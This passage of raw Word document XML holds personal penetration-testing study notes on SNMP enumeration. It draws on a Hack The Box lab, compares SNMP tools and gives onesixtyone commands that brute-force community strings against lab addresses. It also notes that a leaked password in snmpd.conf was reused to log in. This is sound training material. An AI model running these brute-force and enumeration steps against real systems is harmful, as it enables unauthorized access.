          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="792"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-config.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1076">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mentor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB (56:40 time stamp):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw a file that was recently edited and it was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/snmp/snmp.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003090">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was a VERY long file, but we can use grep to ignore the lines that start with comments and include only lines that begin with a character</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -v '^#' /etc/snmp/snmpd. conf | grep .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003092">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v '^#' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">excludes any lines starting with "#"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003093">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> includes only lines starting with any character</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003094">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3799396" cy="1899698"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="22" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1077"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3799396" cy="1899698"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003095">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see a password leaked which was then used to login as a user </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003096">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003097">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003098">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_shd6ecmcgnjq" w:id="430"/>
      <w:bookmarkEnd w:id="430"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explaining all tools (onesixtyone, snmp-brute, snmp-check, snmpbulkwalk, snmpwalk)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003099">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerating Community Strings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="504"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="504"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default on autorecon, and it's good but there was that one </w:t>
      </w:r>
      <w:hyperlink r:id="rId1078">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mentor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB box where it didn't find the "internal" community string but snmp-brute did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="504"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-brute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="504"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supposedly better than onesixtyone BUT it uses metasploit so DON'T USE IT DURING XXXXXXXXX</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping out entire SNMP database (for specific community string)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CLEANEST </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">output out of all the other dump tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Focuses on specific MIB instead of all of them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It formats everything nicely but maybe doesn't get as much info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpbulkwalk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Much </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FASTER </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">than </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It seems to get around the same amount of info as snmpwalk as well. But it's fastest in SNMP version 2/3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumps ALL the MIBs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Much more info than snmp-check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default in autorecon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but as shown in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1079">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mentor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTB, it is MUCH slower than snmpbulkwalk (like 2 minutes vs. 12 minutes slower in the HTB video)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8fwml49emxm7" w:id="431"/>
      <w:bookmarkEnd w:id="431"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tool is used by Autorecon, and it bruteforces the community strings </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt 192.168.118.149  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one just shows the ones that succeeded </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt -dd 192.168.216.149 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
